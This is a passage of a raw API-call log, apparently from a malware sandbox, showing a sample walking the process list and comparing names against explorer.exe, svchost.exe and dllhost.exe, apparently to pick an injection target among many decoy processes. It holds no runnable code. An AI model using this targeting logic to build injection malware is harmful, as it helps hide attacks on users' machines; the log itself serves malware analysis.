[0233.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0233.279] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0233.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0233.279] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.279] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.279] CloseHandle (hObject=0xec) returned 1 [0233.279] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0233.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0233.280] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0233.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0233.280] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.280] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.280] CloseHandle (hObject=0xec) returned 1 [0233.281] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0233.281] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0233.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0233.282] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0233.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0233.282] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.282] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.282] CloseHandle (hObject=0xec) returned 1 [0233.282] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0233.282] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0233.282] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0233.282] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0233.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0233.283] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.283] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.283] CloseHandle (hObject=0xec) returned 1 [0233.283] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0233.283] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0233.283] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0233.283] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0233.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0233.283] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.283] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.283] CloseHandle (hObject=0xec) returned 1 [0233.283] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0233.283] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0233.284] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0233.284] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0233.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0233.284] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.284] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.284] CloseHandle (hObject=0xec) returned 1 [0233.284] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0233.284] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0233.284] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0233.284] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0233.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0233.285] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.285] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.285] CloseHandle (hObject=0xec) returned 1 [0233.285] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0233.285] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0233.285] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0233.285] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0233.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0233.285] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.285] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.285] CloseHandle (hObject=0xec) returned 1 [0233.286] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0233.286] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0233.286] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0233.286] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0233.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0233.286] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.286] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.286] CloseHandle (hObject=0xec) returned 1 [0233.286] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0233.286] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0233.286] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0233.286] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0233.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0233.287] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.287] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.287] CloseHandle (hObject=0xec) returned 1 [0233.287] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0233.287] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0233.287] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0233.287] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0233.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0233.287] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.287] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.287] CloseHandle (hObject=0xec) returned 1 [0233.288] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0233.288] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0233.288] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0233.288] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0233.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0233.288] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.288] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.288] CloseHandle (hObject=0xec) returned 1 [0233.288] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0233.288] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0233.288] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0233.288] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0233.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0233.289] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.289] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.289] CloseHandle (hObject=0xec) returned 1 [0233.289] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0233.289] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0233.289] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0233.289] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0233.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0233.289] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.289] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.289] CloseHandle (hObject=0xec) returned 1 [0233.290] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0233.290] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0233.290] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0233.290] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0233.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0233.290] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.290] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.290] CloseHandle (hObject=0xec) returned 1 [0233.290] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0233.290] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0233.290] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0233.290] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0233.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0233.291] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.291] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.291] CloseHandle (hObject=0xec) returned 1 [0233.291] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0233.291] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0233.291] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0233.291] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0233.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0233.301] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.301] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.301] CloseHandle (hObject=0xec) returned 1 [0233.301] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0233.301] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0233.301] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0233.301] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0233.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0233.302] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.302] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.302] CloseHandle (hObject=0xec) returned 1 [0233.302] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0233.302] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0233.302] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0233.302] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0233.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0233.302] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.302] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.302] CloseHandle (hObject=0xec) returned 1 [0233.302] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0233.302] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0233.302] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0233.302] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0233.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0233.303] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.303] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.303] CloseHandle (hObject=0xec) returned 1 [0233.303] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0233.303] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0233.303] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0233.303] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0233.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0233.304] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.304] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.304] CloseHandle (hObject=0xec) returned 1 [0233.304] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0233.304] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0233.304] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0233.304] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0233.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0233.304] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.304] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.304] CloseHandle (hObject=0xec) returned 1 [0233.304] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0233.304] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0233.304] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0233.304] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0233.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0233.305] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.305] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.305] CloseHandle (hObject=0xec) returned 1 [0233.305] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0233.305] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0233.305] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0233.305] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0233.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0233.306] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0233.306] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0233.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0233.307] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0233.307] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0233.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0233.308] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0233.308] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.308] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.308] CloseHandle (hObject=0xec) returned 1 [0233.308] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0233.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0233.309] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.309] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.309] CloseHandle (hObject=0xec) returned 1 [0233.309] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0233.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0233.309] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0233.310] IsWow64Process (in: hProcess=0xffffffff, 